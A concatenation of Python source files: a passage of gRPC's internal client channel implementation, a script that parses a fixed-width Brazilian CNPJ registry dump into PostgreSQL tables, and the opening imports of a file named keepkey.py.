_NON_OK_RENDEZVOUS_REPR_FORMAT = ('<_Rendezvous of RPC that terminated with:\n'
'\tstatus = {}\n'
'\tdetails = "{}"\n'
'\tdebug_error_string = "{}"\n'
'>')
def _deadline(timeout):
return None if timeout is None else time.time() + timeout
def _unknown_code_details(unknown_cygrpc_code, details):
return 'Server sent unknown code {} and details "{}"'.format(
unknown_cygrpc_code, details)
def _wait_once_until(condition, until):
if until is None:
condition.wait()
else:
remaining = until - time.time()
if remaining < 0:
raise grpc.FutureTimeoutError()
else:
condition.wait(timeout=remaining)
class _RPCState(object):
def __init__(self, due, initial_metadata, trailing_metadata, code, details):
self.condition = threading.Condition()
# The cygrpc.OperationType objects representing events due from the RPC's
# completion queue.
self.due = set(due)
self.initial_metadata = initial_metadata
self.response = None
self.trailing_metadata = trailing_metadata
self.code = code
self.details = details
self.debug_error_string = None
# The semantics of grpc.Future.cancel and grpc.Future.cancelled are
# slightly wonky, so they have to be tracked separately from the rest of the
# result of the RPC. This field tracks whether cancellation was requested
# prior to termination of the RPC.
self.cancelled = False
self.callbacks = []
self.fork_epoch = cygrpc.get_fork_epoch()
def reset_postfork_child(self):
self.condition = threading.Condition()
def _abort(state, code, details):
if state.code is None:
state.code = code
state.details = details
if state.initial_metadata is None:
state.initial_metadata = ()
state.trailing_metadata = ()
def _handle_event(event, state, response_deserializer):
callbacks = []
for batch_operation in event.batch_operations:
operation_type = batch_operation.type()
state.due.remove(operation_type)
if operation_type == cygrpc.OperationType.receive_initial_metadata:
state.initial_metadata = batch_operation.initial_metadata()
elif operation_type == cygrpc.OperationType.receive_message:
serialized_response = batch_operation.message()
if serialized_response is not None:
response = _common.deserialize(serialized_response,
response_deserializer)
if response is None:
details = 'Exception deserializing response!'
_abort(state, grpc.StatusCode.INTERNAL, details)
else:
state.response = response
elif operation_type == cygrpc.OperationType.receive_status_on_client:
state.trailing_metadata = batch_operation.trailing_metadata()
if state.code is None:
code = _common.CYGRPC_STATUS_CODE_TO_STATUS_CODE.get(
batch_operation.code())
if code is None:
state.code = grpc.StatusCode.UNKNOWN
state.details = _unknown_code_details(
code, batch_operation.details())
else:
state.code = code
state.details = batch_operation.details()
state.debug_error_string = batch_operation.error_string()
callbacks.extend(state.callbacks)
state.callbacks = None
return callbacks
def _event_handler(state, response_deserializer):
def handle_event(event):
with state.condition:
callbacks = _handle_event(event, state, response_deserializer)
state.condition.notify_all()
done = not state.due
for callback in callbacks:
callback()
return done and state.fork_epoch >= cygrpc.get_fork_epoch()
return handle_event
#pylint: disable=too-many-statements
def _consume_request_iterator(request_iterator, state, call, request_serializer,
event_handler):
if cygrpc.is_fork_support_enabled():
condition_wait_timeout = 1.0
else:
condition_wait_timeout = None
def consume_request_iterator(): # pylint: disable=too-many-branches
while True:
return_from_user_request_generator_invoked = False
try:
# The thread may die in user-code. Do not block fork for this.
cygrpc.enter_user_request_generator()
request = next(request_iterator)
except StopIteration:
break
except Exception: # pylint: disable=broad-except
cygrpc.return_from_user_request_generator()
return_from_user_request_generator_invoked = True
code = grpc.StatusCode.UNKNOWN
details = 'Exception iterating requests!'
_LOGGER.exception(details)
call.cancel(_common.STATUS_CODE_TO_CYGRPC_STATUS_CODE[code],
details)
_abort(state, code, details)
return
finally:
if not return_from_user_request_generator_invoked:
cygrpc.return_from_user_request_generator()
serialized_request = _common.serialize(request, request_serializer)
with state.condition:
if state.code is None and not state.cancelled:
if serialized_request is None:
code = grpc.StatusCode.INTERNAL
details = 'Exception serializing request!'
call.cancel(
_common.STATUS_CODE_TO_CYGRPC_STATUS_CODE[code],
details)
_abort(state, code, details)
return
else:
operations = (cygrpc.SendMessageOperation(
serialized_request, _EMPTY_FLAGS),)
operating = call.operate(operations, event_handler)
if operating:
state.due.add(cygrpc.OperationType.send_message)
else:
return
while True:
state.condition.wait(condition_wait_timeout)
cygrpc.block_if_fork_in_progress(state)
if state.code is None:
if cygrpc.OperationType.send_message not in state.due:
break
else:
return
else:
return
with state.condition:
if state.code is None:
operations = (
cygrpc.SendCloseFromClientOperation(_EMPTY_FLAGS),)
operating = call.operate(operations, event_handler)
if operating:
state.due.add(cygrpc.OperationType.send_close_from_client)
consumption_thread = cygrpc.ForkManagedThread(
target=consume_request_iterator)
consumption_thread.setDaemon(True)
consumption_thread.start()
class _Rendezvous(grpc.RpcError, grpc.Future, grpc.Call): # pylint: disable=too-many-ancestors
def __init__(self, state, call, response_deserializer, deadline):
super(_Rendezvous, self).__init__()
self._state = state
self._call = call
self._response_deserializer = response_deserializer
self._deadline = deadline
def cancel(self):
with self._state.condition:
if self._state.code is None:
code = grpc.StatusCode.CANCELLED
details = 'Locally cancelled by application!'
self._call.cancel(
_common.STATUS_CODE_TO_CYGRPC_STATUS_CODE[code], details)
self._state.cancelled = True
_abort(self._state, code, details)
self._state.condition.notify_all()
return False
def cancelled(self):
with self._state.condition:
return self._state.cancelled
def running(self):
with self._state.condition:
return self._state.code is None
def done(self):
with self._state.condition:
return self._state.code is not None
def result(self, timeout=None):
until = None if timeout is None else time.time() + timeout
with self._state.condition:
while True:
if self._state.code is None:
_wait_once_until(self._state.condition, until)
elif self._state.code is grpc.StatusCode.OK:
return self._state.response
elif self._state.cancelled:
raise grpc.FutureCancelledError()
else:
raise self
def exception(self, timeout=None):
until = None if timeout is None else time.time() + timeout
with self._state.condition:
while True:
if self._state.code is None:
_wait_once_until(self._state.condition, until)
elif self._state.code is grpc.StatusCode.OK:
return None
elif self._state.cancelled:
raise grpc.FutureCancelledError()
else:
return self
def traceback(self, timeout=None):
until = None if timeout is None else time.time() + timeout
with self._state.condition:
while True:
if self._state.code is None:
_wait_once_until(self._state.condition, until)
elif self._state.code is grpc.StatusCode.OK:
return None
elif self._state.cancelled:
raise grpc.FutureCancelledError()
else:
try:
raise self
except grpc.RpcError:
return sys.exc_info()[2]
def add_done_callback(self, fn):
with self._state.condition:
if self._state.code is None:
self._state.callbacks.append(lambda: fn(self))
return
fn(self)
def _next(self):
with self._state.condition:
if self._state.code is None:
event_handler = _event_handler(self._state,
self._response_deserializer)
operating = self._call.operate(
(cygrpc.ReceiveMessageOperation(_EMPTY_FLAGS),),
event_handler)
if operating:
self._state.due.add(cygrpc.OperationType.receive_message)
elif self._state.code is grpc.StatusCode.OK:
raise StopIteration()
else:
raise self
while True:
self._state.condition.wait()
if self._state.response is not None:
response = self._state.response
self._state.response = None
return response
elif cygrpc.OperationType.receive_message not in self._state.due:
if self._state.code is grpc.StatusCode.OK:
raise StopIteration()
elif self._state.code is not None:
raise self
def __iter__(self):
return self
def __next__(self):
return self._next()
def next(self):
return self._next()
def is_active(self):
with self._state.condition:
return self._state.code is None
def time_remaining(self):
if self._deadline is None:
return None
else:
return max(self._deadline - time.time(), 0)
def add_callback(self, callback):
with self._state.condition:
if self._state.callbacks is None:
return False
else:
self._state.callbacks.append(callback)
return True
def initial_metadata(self):
with self._state.condition:
while self._state.initial_metadata is None:
self._state.condition.wait()
return self._state.initial_metadata
def trailing_metadata(self):
with self._state.condition:
while self._state.trailing_metadata is None:
self._state.condition.wait()
return self._state.trailing_metadata
def code(self):
with self._state.condition:
while self._state.code is None:
self._state.condition.wait()
return self._state.code
def details(self):
with self._state.condition:
while self._state.details is None:
self._state.condition.wait()
return _common.decode(self._state.details)
def debug_error_string(self):
with self._state.condition:
while self._state.debug_error_string is None:
self._state.condition.wait()
return _common.decode(self._state.debug_error_string)
def _repr(self):
with self._state.condition:
if self._state.code is None:
return '<_Rendezvous object of in-flight RPC>'
elif self._state.code is grpc.StatusCode.OK:
return _OK_RENDEZVOUS_REPR_FORMAT.format(
self._state.code, self._state.details)
else:
return _NON_OK_RENDEZVOUS_REPR_FORMAT.format(
self._state.code, self._state.details,
self._state.debug_error_string)
def __repr__(self):
return self._repr()
def __str__(self):
return self._repr()
def __del__(self):
with self._state.condition:
if self._state.code is None:
self._state.code = grpc.StatusCode.CANCELLED
self._state.details = 'Cancelled upon garbage collection!'
self._state.cancelled = True
self._call.cancel(
_common.STATUS_CODE_TO_CYGRPC_STATUS_CODE[self._state.code],
self._state.details)
self._state.condition.notify_all()
def _start_unary_request(request, timeout, request_serializer):
deadline = _deadline(timeout)
serialized_request = _common.serialize(request, request_serializer)
if serialized_request is None:
state = _RPCState((), (), (), grpc.StatusCode.INTERNAL,
'Exception serializing request!')
rendezvous = _Rendezvous(state, None, None, deadline)
return deadline, None, rendezvous
else:
return deadline, serialized_request, None
def _end_unary_response_blocking(state, call, with_call, deadline):
if state.code is grpc.StatusCode.OK:
if with_call:
rendezvous = _Rendezvous(state, call, None, deadline)
return state.response, rendezvous
else:
return state.response
else:
raise _Rendezvous(state, None, None, deadline)
def _stream_unary_invocation_operationses(metadata, initial_metadata_flags):
return (
(
cygrpc.SendInitialMetadataOperation(metadata,
initial_metadata_flags),
cygrpc.ReceiveMessageOperation(_EMPTY_FLAGS),
cygrpc.ReceiveStatusOnClientOperation(_EMPTY_FLAGS),
),
(cygrpc.ReceiveInitialMetadataOperation(_EMPTY_FLAGS),),
)
def _stream_unary_invocation_operationses_and_tags(metadata,
initial_metadata_flags):
return tuple((
operations,
None,
)
for operations in _stream_unary_invocation_operationses(
metadata, initial_metadata_flags))
def _determine_deadline(user_deadline):
parent_deadline = cygrpc.get_deadline_from_context()
if parent_deadline is None and user_deadline is None:
return None
elif parent_deadline is not None and user_deadline is None:
return parent_deadline
elif user_deadline is not None and parent_deadline is None:
return user_deadline
else:
return min(parent_deadline, user_deadline)
class _UnaryUnaryMultiCallable(grpc.UnaryUnaryMultiCallable):
# pylint: disable=too-many-arguments
def __init__(self, channel, managed_call, method, request_serializer,
response_deserializer):
self._channel = channel
self._managed_call = managed_call
self._method = method
self._request_serializer = request_serializer
self._response_deserializer = response_deserializer
self._context = cygrpc.build_census_context()
def _prepare(self, request, timeout, metadata, wait_for_ready, compression):
deadline, serialized_request, rendezvous = _start_unary_request(
request, timeout, self._request_serializer)
initial_metadata_flags = _InitialMetadataFlags().with_wait_for_ready(
wait_for_ready)
augmented_metadata = _compression.augment_metadata(
metadata, compression)
if serialized_request is None:
return None, None, None, rendezvous
else:
state = _RPCState(_UNARY_UNARY_INITIAL_DUE, None, None, None, None)
operations = (
cygrpc.SendInitialMetadataOperation(augmented_metadata,
initial_metadata_flags),
cygrpc.SendMessageOperation(serialized_request, _EMPTY_FLAGS),
cygrpc.SendCloseFromClientOperation(_EMPTY_FLAGS),
cygrpc.ReceiveInitialMetadataOperation(_EMPTY_FLAGS),
cygrpc.ReceiveMessageOperation(_EMPTY_FLAGS),
cygrpc.ReceiveStatusOnClientOperation(_EMPTY_FLAGS),
)
return state, operations, deadline, None
def _blocking(self, request, timeout, metadata, credentials, wait_for_ready,
compression):
state, operations, deadline, rendezvous = self._prepare(
request, timeout, metadata, wait_for_ready, compression)
if state is None:
raise rendezvous # pylint: disable-msg=raising-bad-type
else:
call = self._channel.segregated_call(
cygrpc.PropagationConstants.GRPC_PROPAGATE_DEFAULTS,
self._method, None, _determine_deadline(deadline), metadata,
None if credentials is None else credentials._credentials, ((
operations,
None,
),), self._context)
event = call.next_event()
_handle_event(event, state, self._response_deserializer)
return state, call
def __call__(self,
request,
timeout=None,
metadata=None,
credentials=None,
wait_for_ready=None,
compression=None):
state, call, = self._blocking(request, timeout, metadata, credentials,
wait_for_ready, compression)
return _end_unary_response_blocking(state, call, False, None)
def with_call(self,
request,
timeout=None,
metadata=None,
credentials=None,
wait_for_ready=None,
compression=None):
state, call, = self._blocking(request, timeout, metadata, credentials,
wait_for_ready, compression)
return _end_unary_response_blocking(state, call, True, None)
def future(self,
request,
timeout=None,
metadata=None,
credentials=None,
wait_for_ready=None,
compression=None):
state, operations, deadline, rendezvous = self._prepare(
request, timeout, metadata, wait_for_ready, compression)
if state is None:
raise rendezvous # pylint: disable-msg=raising-bad-type
else:
event_handler = _event_handler(state, self._response_deserializer)
call = self._managed_call(
cygrpc.PropagationConstants.GRPC_PROPAGATE_DEFAULTS,
self._method, None, deadline, metadata, None
if credentials is None else credentials._credentials,
(operations,), event_handler, self._context)
return _Rendezvous(state, call, self._response_deserializer,
deadline)
class _UnaryStreamMultiCallable(grpc.UnaryStreamMultiCallable):
# pylint: disable=too-many-arguments
def __init__(self, channel, managed_call, method, request_serializer,
response_deserializer):
self._channel = channel
self._managed_call = managed_call
self._method = method
self._request_serializer = request_serializer
self._response_deserializer = response_deserializer
self._context = cygrpc.build_census_context()
def __call__( # pylint: disable=too-many-locals
self,
request,
timeout=None,
metadata=None,
credentials=None,
wait_for_ready=None,
compression=None):
deadline, serialized_request, rendezvous = _start_unary_request(
request, timeout, self._request_serializer)
initial_metadata_flags = _InitialMetadataFlags().with_wait_for_ready(
wait_for_ready)
if serialized_request is None:
raise rendezvous # pylint: disable-msg=raising-bad-type
else:
augmented_metadata = _compression.augment_metadata(
metadata, compression)
state = _RPCState(_UNARY_STREAM_INITIAL_DUE, None, None, None, None)
operationses = (
(
cygrpc.SendInitialMetadataOperation(augmented_metadata,
initial_metadata_flags),
cygrpc.SendMessageOperation(serialized_request,
_EMPTY_FLAGS),
cygrpc.SendCloseFromClientOperation(_EMPTY_FLAGS),
cygrpc.ReceiveStatusOnClientOperation(_EMPTY_FLAGS),
),
(cygrpc.ReceiveInitialMetadataOperation(_EMPTY_FLAGS),),
)
call = self._managed_call(
cygrpc.PropagationConstants.GRPC_PROPAGATE_DEFAULTS,
self._method, None, _determine_deadline(deadline), metadata,
None if credentials is None else
credentials._credentials, operationses,
_event_handler(state,
self._response_deserializer), self._context)
return _Rendezvous(state, call, self._response_deserializer,
deadline)
class _StreamUnaryMultiCallable(grpc.StreamUnaryMultiCallable):
# pylint: disable=too-many-arguments
def __init__(self, channel, managed_call, method, request_serializer,
response_deserializer):
self._channel = channel
self._managed_call = managed_call
self._method = method
self._request_serializer = request_serializer
self._response_deserializer = response_deserializer
self._context = cygrpc.build_census_context()
def _blocking(self, request_iterator, timeout, metadata, credentials,
wait_for_ready, compression):
deadline = _deadline(timeout)
state = _RPCState(_STREAM_UNARY_INITIAL_DUE, None, None, None, None)
initial_metadata_flags = _InitialMetadataFlags().with_wait_for_ready(
wait_for_ready)
augmented_metadata = _compression.augment_metadata(
metadata, compression)
call = self._channel.segregated_call(
cygrpc.PropagationConstants.GRPC_PROPAGATE_DEFAULTS, self._method,
None, _determine_deadline(deadline), augmented_metadata, None
if credentials is None else credentials._credentials,
_stream_unary_invocation_operationses_and_tags(
augmented_metadata, initial_metadata_flags), self._context)
_consume_request_iterator(request_iterator, state, call,
self._request_serializer, None)
while True:
event = call.next_event()
with state.condition:
_handle_event(event, state, self._response_deserializer)
state.condition.notify_all()
if not state.due:
break
return state, call
def __call__(self,
request_iterator,
timeout=None,
metadata=None,
credentials=None,
wait_for_ready=None,
compression=None):
state, call, = self._blocking(request_iterator, timeout, metadata,
credentials, wait_for_ready, compression)
return _end_unary_response_blocking(state, call, False, None)
def with_call(self,
request_iterator,
timeout=None,
metadata=None,
credentials=None,
wait_for_ready=None,
compression=None):
state, call, = self._blocking(request_iterator, timeout, metadata,
credentials, wait_for_ready, compression)
return _end_unary_response_blocking(state, call, True, None)
def future(self,
request_iterator,
timeout=None,
metadata=None,
credentials=None,
wait_for_ready=None,
compression=None):
deadline = _deadline(timeout)
state = _RPCState(_STREAM_UNARY_INITIAL_DUE, None, None, None, None)
event_handler = _event_handler(state, self._response_deserializer)
initial_metadata_flags = _InitialMetadataFlags().with_wait_for_ready(
wait_for_ready)
augmented_metadata = _compression.augment_metadata(
metadata, compression)
call = self._managed_call(
cygrpc.PropagationConstants.GRPC_PROPAGATE_DEFAULTS, self._method,
None, deadline, augmented_metadata, None
if credentials is None else credentials._credentials,
_stream_unary_invocation_operationses(
metadata, initial_metadata_flags), event_handler, self._context)
_consume_request_iterator(request_iterator, state, call,
self._request_serializer, event_handler)
return _Rendezvous(state, call, self._response_deserializer, deadline)
class _StreamStreamMultiCallable(grpc.StreamStreamMultiCallable):
# pylint: disable=too-many-arguments
def __init__(self, channel, managed_call, method, request_serializer,
response_deserializer):
self._channel = channel
self._managed_call = managed_call
self._method = method
self._request_serializer = request_serializer
self._response_deserializer = response_deserializer
self._context = cygrpc.build_census_context()
def __call__(self,
request_iterator,
timeout=None,
metadata=None,
credentials=None,
wait_for_ready=None,
compression=None):
deadline = _deadline(timeout)
state = _RPCState(_STREAM_STREAM_INITIAL_DUE, None, None, None, None)
initial_metadata_flags = _InitialMetadataFlags().with_wait_for_ready(
wait_for_ready)
augmented_metadata = _compression.augment_metadata(
metadata, compression)
operationses = (
(
cygrpc.SendInitialMetadataOperation(augmented_metadata,
initial_metadata_flags),
cygrpc.ReceiveStatusOnClientOperation(_EMPTY_FLAGS),
),
(cygrpc.ReceiveInitialMetadataOperation(_EMPTY_FLAGS),),
)
event_handler = _event_handler(state, self._response_deserializer)
call = self._managed_call(
cygrpc.PropagationConstants.GRPC_PROPAGATE_DEFAULTS, self._method,
None, _determine_deadline(deadline), augmented_metadata, None
if credentials is None else credentials._credentials, operationses,
event_handler, self._context)
_consume_request_iterator(request_iterator, state, call,
self._request_serializer, event_handler)
return _Rendezvous(state, call, self._response_deserializer, deadline)
class _InitialMetadataFlags(int):
"""Stores immutable initial metadata flags"""
def __new__(cls, value=_EMPTY_FLAGS):
value &= cygrpc.InitialMetadataFlags.used_mask
return super(_InitialMetadataFlags, cls).__new__(cls, value)
def with_wait_for_ready(self, wait_for_ready):
if wait_for_ready is not None:
if wait_for_ready:
return self.__class__(self | cygrpc.InitialMetadataFlags.wait_for_ready | \
cygrpc.InitialMetadataFlags.wait_for_ready_explicitly_set)
elif not wait_for_ready:
return self.__class__(self & ~cygrpc.InitialMetadataFlags.wait_for_ready | \
cygrpc.InitialMetadataFlags.wait_for_ready_explicitly_set)
return self
class _ChannelCallState(object):
def __init__(self, channel):
self.lock = threading.Lock()
self.channel = channel
self.managed_calls = 0
self.threading = False
def reset_postfork_child(self):
self.managed_calls = 0
def _run_channel_spin_thread(state):
def channel_spin():
while True:
cygrpc.block_if_fork_in_progress(state)
event = state.channel.next_call_event()
if event.completion_type == cygrpc.CompletionType.queue_timeout:
continue
call_completed = event.tag(event)
if call_completed:
with state.lock:
state.managed_calls -= 1
if state.managed_calls == 0:
return
channel_spin_thread = cygrpc.ForkManagedThread(target=channel_spin)
channel_spin_thread.setDaemon(True)
channel_spin_thread.start()
def _channel_managed_call_management(state):
# pylint: disable=too-many-arguments
def create(flags, method, host, deadline, metadata, credentials,
operationses, event_handler, context):
"""Creates a cygrpc.IntegratedCall.
Args:
flags: An integer bitfield of call flags.
method: The RPC method.
host: A host string for the created call.
deadline: A float to be the deadline of the created call or None if
the call is to have an infinite deadline.
metadata: The metadata for the call or None.
credentials: A cygrpc.CallCredentials or None.
operationses: An iterable of iterables of cygrpc.Operations to be
started on the call.
event_handler: A behavior to call to handle the events resultant from
the operations on the call.
context: Context object for distributed tracing.
Returns:
A cygrpc.IntegratedCall with which to conduct an RPC.
"""
operationses_and_tags = tuple((
operations,
event_handler,
) for operations in operationses)
with state.lock:
call = state.channel.integrated_call(flags, method, host, deadline,
metadata, credentials,
operationses_and_tags, context)
if state.managed_calls == 0:
state.managed_calls = 1
_run_channel_spin_thread(state)
else:
state.managed_calls += 1
return call
return create
class _ChannelConnectivityState(object):
def __init__(self, channel):
self.lock = threading.RLock()
self.channel = channel
self.polling = False
self.connectivity = None
self.try_to_connect = False
self.callbacks_and_connectivities = []
self.delivering = False
def reset_postfork_child(self):
self.polling = False
self.connectivity = None
self.try_to_connect = False
self.callbacks_and_connectivities = []
self.delivering = False
def _deliveries(state):
callbacks_needing_update = []
for callback_and_connectivity in state.callbacks_and_connectivities:
callback, callback_connectivity, = callback_and_connectivity
if callback_connectivity is not state.connectivity:
callbacks_needing_update.append(callback)
callback_and_connectivity[1] = state.connectivity
return callbacks_needing_update
def _deliver(state, initial_connectivity, initial_callbacks):
connectivity = initial_connectivity
callbacks = initial_callbacks
while True:
for callback in callbacks:
cygrpc.block_if_fork_in_progress(state)
try:
callback(connectivity)
except Exception: # pylint: disable=broad-except
_LOGGER.exception(
_CHANNEL_SUBSCRIPTION_CALLBACK_ERROR_LOG_MESSAGE)
with state.lock:
callbacks = _deliveries(state)
if callbacks:
connectivity = state.connectivity
else:
state.delivering = False
return
def _spawn_delivery(state, callbacks):
delivering_thread = cygrpc.ForkManagedThread(
target=_deliver, args=(
state,
state.connectivity,
callbacks,
))
delivering_thread.start()
state.delivering = True
# NOTE(https://github.com/grpc/grpc/issues/3064): We'd rather not poll.
def _poll_connectivity(state, channel, initial_try_to_connect):
try_to_connect = initial_try_to_connect
connectivity = channel.check_connectivity_state(try_to_connect)
with state.lock:
state.connectivity = (
_common.CYGRPC_CONNECTIVITY_STATE_TO_CHANNEL_CONNECTIVITY[
connectivity])
callbacks = tuple(callback
for callback, unused_but_known_to_be_none_connectivity
in state.callbacks_and_connectivities)
for callback_and_connectivity in state.callbacks_and_connectivities:
callback_and_connectivity[1] = state.connectivity
if callbacks:
_spawn_delivery(state, callbacks)
while True:
event = channel.watch_connectivity_state(connectivity,
time.time() + 0.2)
cygrpc.block_if_fork_in_progress(state)
with state.lock:
if not state.callbacks_and_connectivities and not state.try_to_connect:
state.polling = False
state.connectivity = None
break
try_to_connect = state.try_to_connect
state.try_to_connect = False
if event.success or try_to_connect:
connectivity = channel.check_connectivity_state(try_to_connect)
with state.lock:
state.connectivity = (
_common.CYGRPC_CONNECTIVITY_STATE_TO_CHANNEL_CONNECTIVITY[
connectivity])
if not state.delivering:
callbacks = _deliveries(state)
if callbacks:
_spawn_delivery(state, callbacks)
def _subscribe(state, callback, try_to_connect):
with state.lock:
if not state.callbacks_and_connectivities and not state.polling:
polling_thread = cygrpc.ForkManagedThread(
target=_poll_connectivity,
args=(state, state.channel, bool(try_to_connect)))
polling_thread.setDaemon(True)
polling_thread.start()
state.polling = True
state.callbacks_and_connectivities.append([callback, None])
elif not state.delivering and state.connectivity is not None:
_spawn_delivery(state, (callback,))
state.try_to_connect |= bool(try_to_connect)
state.callbacks_and_connectivities.append(
[callback, state.connectivity])
else:
state.try_to_connect |= bool(try_to_connect)
state.callbacks_and_connectivities.append([callback, None])
def _unsubscribe(state, callback):
with state.lock:
for index, (subscribed_callback, unused_connectivity) in enumerate(
state.callbacks_and_connectivities):
if callback == subscribed_callback:
state.callbacks_and_connectivities.pop(index)
break
def _augment_options(base_options, compression):
compression_option = _compression.create_channel_option(compression)
return tuple(base_options) + compression_option + ((
cygrpc.ChannelArgKey.primary_user_agent_string,
_USER_AGENT,
),)
class Channel(grpc.Channel):
"""A cygrpc.Channel-backed implementation of grpc.Channel."""
def __init__(self, target, options, credentials, compression):
"""Constructor.
Args:
target: The target to which to connect.
options: Configuration options for the channel.
credentials: A cygrpc.ChannelCredentials or None.
compression: An optional value indicating the compression method to be
used over the lifetime of the channel.
"""
self._channel = cygrpc.Channel(
_common.encode(target), _augment_options(options, compression),
credentials)
self._call_state = _ChannelCallState(self._channel)
self._connectivity_state = _ChannelConnectivityState(self._channel)
cygrpc.fork_register_channel(self)
def subscribe(self, callback, try_to_connect=None):
_subscribe(self._connectivity_state, callback, try_to_connect)
def unsubscribe(self, callback):
_unsubscribe(self._connectivity_state, callback)
def unary_unary(self,
method,
request_serializer=None,
response_deserializer=None):
return _UnaryUnaryMultiCallable(
self._channel, _channel_managed_call_management(self._call_state),
_common.encode(method), request_serializer, response_deserializer)
def unary_stream(self,
method,
request_serializer=None,
response_deserializer=None):
return _UnaryStreamMultiCallable(
self._channel, _channel_managed_call_management(self._call_state),
_common.encode(method), request_serializer, response_deserializer)
def stream_unary(self,
method,
request_serializer=None,
response_deserializer=None):
return _StreamUnaryMultiCallable(
self._channel, _channel_managed_call_management(self._call_state),
_common.encode(method), request_serializer, response_deserializer)
def stream_stream(self,
method,
request_serializer=None,
response_deserializer=None):
return _StreamStreamMultiCallable(
self._channel, _channel_managed_call_management(self._call_state),
_common.encode(method), request_serializer, response_deserializer)
def _unsubscribe_all(self):
state = self._connectivity_state
if state:
with state.lock:
del state.callbacks_and_connectivities[:]
def _close(self):
self._unsubscribe_all()
self._channel.close(cygrpc.StatusCode.cancelled, 'Channel closed!')
cygrpc.fork_unregister_channel(self)
def _close_on_fork(self):
self._unsubscribe_all()
self._channel.close_on_fork(cygrpc.StatusCode.cancelled,
'Channel closed due to fork')
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self._close()
return False
def close(self):
self._close()
def __del__(self):
# TODO(https://github.com/grpc/grpc/issues/12531): Several releases
# after 1.12 (1.16 or thereabouts?) add a "self._channel.close" call
# here (or more likely, call self._close() here). We don't do this today
# because many valid use cases today allow the channel to be deleted
# immediately after stubs are created. After a sufficient period of time
        # has passed for all users to be trusted to hold on to their channels
# for as long as they are in use and to close them after using them,
# then deletion of this grpc._channel.Channel instance can be made to
# effect closure of the underlying cygrpc.Channel instance.
try:
self._unsubscribe_all()
except: # pylint: disable=bare-except
# Exceptions in __del__ are ignored by Python anyway, but they can
# keep spamming logs. Just silence them.
pass
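# Editor's note: a minimal, hedged usage sketch of the context-manager protocol
# implemented by Channel above. It is kept as a comment because this module is an
# internal of the grpc package and is not meant to be run directly; the target
# address and method name are placeholders.
#
#     import grpc
#     with grpc.insecure_channel('localhost:50051') as channel:
#         # creating a multicallable issues no RPC; __exit__ delegates to _close()
#         method = channel.unary_unary('/example.Service/Method')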
|
extraicnpj.py
|
# -*- coding: utf-8 -*-
import sys
import io
from FilaDeLinhas import FilaDeLinhas
import threading
from GravaCnpj import GravacaoPgCopy
def trata(texto):
ok = texto
ok = ok.replace(';',' ')
ok = ok.replace('"',' ')
ok = ok.replace('\0','')
ok = ok.replace('\\','/')
ok = ok.strip()
while ' ' in ok:
ok = ok.replace(' ',' ')
return ok
def data(ymd : str) -> str:
if ymd == '00000000':
x = ''
else:
x = ymd[:4] + '-' + ymd[4:6] + '-' + ymd[6:8]
return x
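# Editor's note: hedged illustration of the two helpers above; the sample values
# are made up and only show the intended normalisation.
#     trata('ACME ; "LTDA"  ')  ->  'ACME LTDA'
#     data('19991231')          ->  '1999-12-31'
#     data('00000000')          ->  ''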
def processatipo1(regsd : FilaDeLinhas,line):
cnpj = line[3:17]
matriz = line[17]
razsoc = trata(line[18:168])
fantasia = trata(line[168:223])
situac = line[223:225]
dt_situac = line[225:233]
motivo = line[233:235]
dt_ini = line[367:375]
cnae = line[375:382]
tipolog = line[382:402]
lograd = trata(line[402:462])
numend = trata(line[462:468])
comple = trata(line[468:624])
bairro = trata(line[624:674])
uf = line[682:684]
munic = trata(line[688:738])
email = trata(line[774:889])
capit = line[891:905]
capit = capit.strip()
capit = capit[:-2]+'.'+capit[-2:]
porte = line[905:907]
simples = line[907:909]
mei = line[924]
linha = cnpj+';'+matriz+';'+razsoc.strip()+';'+fantasia.strip()+';'+situac+';'+data(dt_situac)+';'+motivo+';'+data(dt_ini)+';'+cnae+';'+tipolog.strip()+';'+lograd.strip()+';'+numend.strip()+';'+comple.strip()+';'+bairro.strip()+';'+uf+';'+munic.strip()+';'+email.strip()+';'+capit+';'+porte+';'+simples+';'+mei+'\n'
linha = linha.encode('UTF-8','ignore').decode('UTF-8')
regsd.AdicionaLinha(linha)
return
def processatipo2(regss : FilaDeLinhas,line,ultlinha2):
cnpj = line[3:17]
socio = trata(line[18:168])
cpfsoc = line[168:182]
qualif = line[182:184]
dt_ent = line[189:197]
cpfleg = line[270:281]
linhasoc = cnpj+';'+socio.strip()+';'+cpfsoc+';'+qualif+';'+data(dt_ent)+';'+cpfleg+'\n'
if linhasoc in ultlinha2:
return ultlinha2
ultlinha2 = ultlinha2 + ' ' + linhasoc
linhasoc = linhasoc.encode('UTF-8','ignore').decode('UTF-8')
regss.AdicionaLinha(linhasoc)
return ultlinha2
def processatipo6(regsc : FilaDeLinhas,line):
cnpj = line[3:17]
cnae = line[17:710]
cnae = cnae.strip()
ult=''
while len(cnae) > 0:
cnaex = cnae[:7]
cnae = cnae[7:]
if cnaex in ult:
            continue
ult = ult + ' ' + cnaex
if cnaex == '0000000' or cnaex == '9999999':
break
regsc.AdicionaLinha(cnpj+';'+cnaex+'\n')
return
def tratar(origd,origs,origc,line,ultlinha2):
if line[0] == '0':
        # header record, no useful information
return ultlinha2
if line[0] == '1':
        # detail records
processatipo1(origd,line)
ultlinha2=''
return ultlinha2
if line[0] == '2':
        # partner (sócios) records
ultlinha2=processatipo2(origs,line,ultlinha2)
return ultlinha2
if line[0] == '6':
processatipo6(origc,line)
        # secondary CNAE codes
return ultlinha2
if line[0] == '9':
        # trailer record, no useful information
return ultlinha2
return ultlinha2
def processark3200():
fprinc=sys.stdin.buffer
origd = FilaDeLinhas()
origs = FilaDeLinhas()
origc = FilaDeLinhas()
outd = threading.Thread(name='detalhe',target=GravacaoPgCopy, args=(origd,'detalhe'))
outs = threading.Thread(name='socios',target=GravacaoPgCopy, args=(origs,'socios'))
outc = threading.Thread(name='cnaes',target=GravacaoPgCopy, args=(origc,'cnaes'))
outd.start()
outs.start()
outc.start()
ultlinha2 = ''
linha = 1
lineb = fprinc.readline()
while lineb:
line = lineb.decode('ISO-8859-15','ignore')
ultlinha2=tratar(origd,origs,origc,line,ultlinha2)
lineb = fprinc.readline()
linha=linha+1
origd.Acabou = True
origs.Acabou = True
origc.Acabou = True
processark3200()
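# Editor's note: hedged invocation sketch. The script above streams a fixed-width
# dump on stdin and hands parsed lines to the three GravacaoPgCopy threads; the
# input file name below is only a placeholder.
#     cat dump_cnpj.txt | python3 extraicnpj.py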
|
keepkey.py
|
from binascii import hexlify, unhexlify
import traceback
import sys
from typing import NamedTuple, Any, Optional, Dict, Union, List, Tuple, TYPE_CHECKING
